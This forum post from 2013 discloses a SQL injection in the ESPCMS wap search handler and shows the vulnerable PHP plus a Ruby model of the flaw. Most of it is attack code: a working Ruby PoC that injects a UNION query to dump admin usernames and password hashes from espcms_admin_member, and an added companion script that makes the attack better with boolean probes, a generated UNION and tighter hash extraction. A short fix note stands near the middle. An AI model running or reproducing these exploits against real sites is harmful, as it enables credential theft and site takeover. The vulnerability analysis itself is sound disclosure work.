中国网络渗透测试联盟
Title: SQL injection in the search handler of the espcms wap module
Author: admin
Posted: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview

ESPCMS (易思ESPCMS企业网站管理系统) is an enterprise website management system built on a LAMP stack. The vendor describes it as simple to operate, feature-rich, stable, extensible and secure, and easy to customize and maintain, so that a powerful, professional corporate website can be set up quickly.

Its handling of incoming parameters is not rigorous enough, and this leads to SQL injection.
0x1 Vulnerability details

The variable flows $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it, which is what makes the injection possible.

Precisely because the variable is read from $_SERVER['QUERY_STRING'] rather than from the request superglobals the application normally sanitizes, it sidesteps the program's own input filtering.

And the injected variable is an array value, not an array key, so it also escapes the filtering that the code applies to keys. Together these produce a rather uncommon SQL injection.

In the in_result function of /interface/3gwap_search.php:
function in_result() {
    ... ... ... ... ... ... ... ... ...
    $urlcode = $_SERVER['QUERY_STRING'];            // raw query string, not the filtered request superglobals
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                $key = addslashes($key);                        // the key is escaped ...
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {                            // ... and must match an existing attribute
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';   // ... but the value is concatenated as-is
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
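To make the key/value asymmetry concrete, here is an added Ruby model of that foreach loop. It is not code from the post or from ESPCMS: it emulates only the small pieces of PHP the handler relies on (parse_str over html_entity_decode, addslashes) and builds $db_where once exactly as the vulnerable code does and once with the value escaped the same way the key already is. The whitelist standing in for the model_att lookup, the `espcms_` table prefix, and the ` WHERE 1=1` prefix (the real start of $db_where is elided in the post) are assumptions made for the example.

```ruby
require "cgi"

# Emulations of the PHP pieces the handler uses. Constructed for this
# example; they cover only what the espcms code path needs.

# parse_str(html_entity_decode($qs), $output) for flat keys and one
# level of attr[name]=value nesting.
def php_parse_str(query_string)
  output = {}
  CGI.unescapeHTML(query_string).split("&").each do |pair|
    key, value = pair.split("=", 2)
    next if key.nil? || key.empty?
    key = CGI.unescape(key)
    value = CGI.unescape(value.to_s)
    if (m = key.match(/\A(\w+)\[([^\]]*)\]\z/))
      (output[m[1]] ||= {})[m[2]] = value
    else
      output[key] = value
    end
  end
  output
end

# addslashes(): backslash before ' " \ and NUL.
def php_addslashes(s)
  s.gsub(/(['"\\])/) { "\\#{$1}" }.gsub("\0", "\\0")
end

# Attribute names that exist in model_att with isclass=1. The real code
# asks the database ($this->db_numrows); a constructed whitelist stands
# in for that lookup here.
KNOWN_ATTRS = %w[jobnum].freeze

# Mirrors the foreach over $output['attr'] in in_result(). With
# escape_value: false this is what the vulnerable code builds; with
# escape_value: true the value gets the same addslashes() the key gets.
def build_db_where(query_string, escape_value: false)
  output = php_parse_str(query_string)
  db_where = " WHERE 1=1"   # assumed placeholder; the real prefix is elided in the post
  attrs = output["attr"]
  if attrs.is_a?(Hash) && !attrs.empty?
    attrs.each do |key, value|
      next if value.empty? || value == "0"           # PHP: if ($value)
      key = php_addslashes(key)                      # key IS escaped ...
      next unless KNOWN_ATTRS.include?(key)          # ... and must name a real attribute
      value = php_addslashes(value) if escape_value  # ... the value is not, in the original
      db_where += " AND b.#{key}='#{value}'"
    end
  end
  db_where
end

# The final statement, with db_prefix assumed to be "espcms_".
def build_sql(query_string, escape_value: false)
  "SELECT b.*,a.* FROM espcms_document AS a LEFT JOIN espcms_document_attr AS b ON a.did=b.did" +
    build_db_where(query_string, escape_value: escape_value) + " LIMIT 0,15"
end

if __FILE__ == $0
  # Constructed query string carrying a shortened form of the PoC payload.
  payload = "ac=search&at=result&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201%23"
  puts build_sql(payload)                      # quote closed, UNION in, rest commented out
  puts build_sql(payload, escape_value: true)  # quote neutralised
  puts build_db_where("attr[a%27%20or%201%3D1]=x")  # injected KEY is escaped and rejected
end
```

Escaping the value only brings it to parity with the key; the proper fix is a prepared statement (or at minimum the driver's own escape function rather than addslashes, which is not charset-aware) together with the attribute-name whitelist that the db_numrows lookup already effectively enforces for the key.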
0x2 PoC
require "net/http"
require "uri"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog: http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "\nsend request..."
  # attr[jobnum] is the injection point: the value closes the b.jobnum='...' literal,
  # UNIONs 45 columns with username&password in column 26, and comments out the rest
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
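An added Ruby companion to the PoC above (mine, not ztz's): it builds the same request but lets URI.encode_www_form do the percent-encoding instead of hand-typing it, adds a true/false boolean probe pair so the injection can be confirmed before any UNION is sent, generates the 45-column UNION with concat() in column 26 rather than spelling it out, and tightens the credential regex to 32 hex digits. The boolean-probe heuristic and the sample response body are constructed for this example; the default host, port and path come from the PoC's usage line.

```ruby
require "uri"

# Fixed query parameters the PoC sends; attr[jobnum] is the only injection point.
BASE_PARAMS = {
  "ac" => "search", "at" => "result", "lng" => "cn", "mid" => "3", "tid" => "11",
  "keyword" => "1", "keyname" => "a.title", "countnum" => "1",
}.freeze

# Request URL with an arbitrary SQL tail. The leading quote closes the
# b.jobnum='...' literal the handler opened; the trailing # comments out the
# closing quote and whatever PageSQL appends.
def injection_url(host, port, path, sql_tail)
  params = BASE_PARAMS.merge("attr[jobnum]" => "1'#{sql_tail}#")
  "http://#{host}:#{port}#{path}wap/index.php?" + URI.encode_www_form(params)
end

# Two requests that differ only by a tautology vs. a contradiction. A clearly
# different result set between them confirms the sink without touching any
# other table. (Added check, not part of the original PoC.)
def boolean_probe_urls(host, port, path)
  { true_case:  injection_url(host, port, path, " or '1'='1"),
    false_case: injection_url(host, port, path, " and '1'='2") }
end

# Crude constructed heuristic: the tautology should list more documents.
def likely_injectable?(true_body, false_body)
  true_body != false_body && true_body.bytesize > false_body.bytesize
end

# The PoC's UNION, generated: `columns` literals with concat() in `slot`.
# 45 and 26 are the numbers the PoC uses.
def dump_url(host, port, path, columns: 45, slot: 26)
  cols = (1..columns).map { |i| i == slot ? "concat(username,CHAR(38),password)" : i.to_s }
  injection_url(host, port, path, " and 1=2 UNION SELECT #{cols.join(',')} from espcms_admin_member;")
end

# Same idea as the PoC's /\w+&\w{32}/, but require 32 hex digits so an
# ordinary "word&word" elsewhere in the page cannot match.
CRED_RE = /(\w+)&([0-9a-fA-F]{32})/

def extract_credentials(body)
  body.scan(CRED_RE).map { |user, hash| [user, hash.downcase] }
end

# Constructed response fragment standing in for a real search-result page.
SAMPLE_BODY = <<~HTML
  <li><a href="index.php?ac=document&did=2">admin&0123456789ABCDEF0123456789abcdef</a></li>
  <li>foo&amp;bar</li>
HTML

if __FILE__ == $0
  host, port, path = ARGV.values_at(0, 1, 2)
  host ||= "www.target.com"
  port ||= "80"
  path ||= "/"
  puts boolean_probe_urls(host, port, path).values
  puts dump_url(host, port, path)
  p extract_credentials(SAMPLE_BODY)
end
```

Fetch the two boolean URLs with the PoC's request helper and feed the bodies to likely_injectable? before requesting dump_url; the UNION column count (45) and the concat slot (26) are the PoC's values and will need adjusting for a different schema.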
中国网络渗透测试联盟 (https://www.cobjon.com/)